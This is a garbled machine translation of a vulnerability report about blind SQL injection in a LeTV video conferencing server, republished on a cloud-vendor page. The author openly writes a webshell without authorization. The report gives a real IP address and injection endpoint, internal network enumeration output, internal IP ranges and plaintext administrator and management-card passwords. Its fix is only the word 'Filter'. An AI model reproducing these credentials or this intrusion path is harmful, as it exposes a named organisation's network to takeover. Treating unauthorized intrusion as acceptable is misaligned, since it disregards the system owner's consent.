Levision video conferencing system can be injected with shell and Intranet.

Last Update:2015-04-22 Source: Internet

Author: User

Tags web server operating system

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Levision video conferencing system can be injected with shell and Intranet.

Blind SQL Injection exists in the letv Video Conferencing System. Attackers can use SQL injection to directly write the shell.

It seems that this meeting system has just been launched?

In the current environment, you can access the Intranet. You only need to obtain the internal network segment.

In addition, I have not done any other actions. I will delete webshell myself. If it is inconvenient for management, please forgive me. Without your authorization, the process will undergo penetration testing. Please include more information, I just hope to help you solve some problems.

SQL Injection address:

Http: // 115.182.51.182: 8090 // web/dept. php

[03:56:45] [INFO] the back-end DBMS is MySQL

Web server operating system: Windows

Web application technology: PHP 5.2.6, Apache 2.2.8

Back-end DBMS: MySQL 4.1

C: \> ipconfig/all

Windows IP configuration

Host Name ......: WIN-SKTH4MFTLEV

Primary DNS suffix ...........:

Node Type ......: Hybrid

IP Route enabled...

WINS proxy enabled...: No

Local Ethernet Adapter connection:

Connection to a specific DNS suffix .......:

Description ......: Intel (R) PRO/1000 MT Network Connection

Physical address ......: 00-50-56-89-1A-20

DHCP is enabled... no

Automatic configuration is enabled... yes

Local IPv6 address ......: fe80: 6df0: 6624: a50a: ebed % 11 (preferred)

IPv4 address ......: 115.182.51.182 (preferred)

Subnet Mask ......: 255.255.255.0

Default Gateway ......: 115.182.51.1

DHCPv6 IAID ......: 234901590

DHCPv6 client DUID ......: 00-01-00-01-17-01-F0-95-00-50-56-89-1A-20

DNS server ......: 219.141.136.10

219.141.140.10

NetBIOS on TCPIP...: Enabled

Tunnel adapter isatap. {E8BF1C9C-D390-4948-95D5-745DC82A29AB }:

Media status ......: the media has been disconnected.

Connection to a specific DNS suffix .......:

Description ......: Microsoft ISATAP Adapter

Physical address...

DHCP is enabled... no

Automatic configuration is enabled... yes

Tunnel adapter Teredo Tunneling Pseudo-Interface:

Connection to a specific DNS suffix .......:

Description ......: Teredo Tunneling Pseudo-Interface

Physical address...

DHCP is enabled... no

Automatic configuration is enabled... yes

IPv6 address ......: 2001: 0: 9d38: 90d7: 244c: 28e2: 8c49: cc49 (preferred)

Local IPv6 address ......: fe80: 244c: 28e2: 8c49: cc49 % 13 (preferred)

Default Gateway .............:

NetBIOS on TCPIP...: Disabled

Tunnel Adapter 6TO4 Adapter:

Connection to a specific DNS suffix .......:

Description ......: Microsoft 6to4 Adapter

Physical address...

DHCP is enabled... no

Automatic configuration is enabled... yes

IPv6 address ......: 2002: 73b6: 33b6: 73b6: 33b6: 33b6: 33b6 (preferred)

Default Gateway ........: 2002: c058: 6301: c058: 6301

DNS server ......: 219.141.136.10

219.141.140.10

NetBIOS on TCPIP...: Disabled

C: \> net view

Server Name Annotation

-------------------------------------------------------------------------------

\ LETV letv server (Samba, Ubuntu)

\ SVCTAG-BSDNK2X

\ WIN-496RU2U6F1F

\ WIN-SKTH4MFTLEV

The command is successfully completed.

C: \> net user

\ User Account

-------------------------------------------------------------------------------

Administrator

Mask Region

  
   *****nx*****

Ian duhaibin

Guest liguotao

The command has been run, but one or more errors have occurred.

C: \> query user

User name session name ID status idle time Logon Time

C

Mask Region

  
   *****xu*****

Ian 2 disconnection 27 + 15: 38

L

Mask Region

  
   *****ot*****

O 3 disconnect 1 + 08: 57

Administrator 4 disconnected 6 + 17: 04

WIN-SKTH4MFTLEV \ c

Mask Region

  
   *****eji*****

: Letv123! @#

WIN-SKTH4MFTLEV \

Mask Region

  
   *****uo*****

: Letv123! @#

WIN-SKTH4MFTLEV \ Administrator: letv123! @#

ItGzjI7fAqMgrk2

219.153.14.131

10.1.14.131

ItGzjI7fAqMgrk2

220.178.229.12

10.1.229.12

IP1 low Management Card Temporary Management Card

113.6.235.1010.1.235.10113.6.235.110

113.6.235.1110.1.235.11113.6.235.111

113.6.235.1210.1.235.12113.6.235.112

113.6.235.1310.1.235.13113.6.235.113

113.6.235.1410.1.235.14113.6.235.114

113.6.235.1510.1.235.15113.6.235.115

113.6.235.1610.1.235.16113.6.235.116

113.6.235.1710.1.235.17113.6.235.117

113.6.235.1810.1.235.18113.6.235.118

113.6.235.1910.1.235.19113.6.235.119

113.6.235.2010.1.235.20113.6.235.120

113.6.235.2110.1.235.21113.6.235.121

113.6.235.2210.1.235.22113.6.235.122

113.6.235.2310.1.235.23113.6.235.123

113.6.235.2410.1.235.24113.6.235.124

Vi/etc/sysconfig/network-scripts/ifcfg-eth0

Service network restart

Calvin

TVLE800G

Mask: 255.255.255.128

Gateway: 113.6.235.1

CDN-HLJ-HEB-CNC-

Solution:

Filter

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More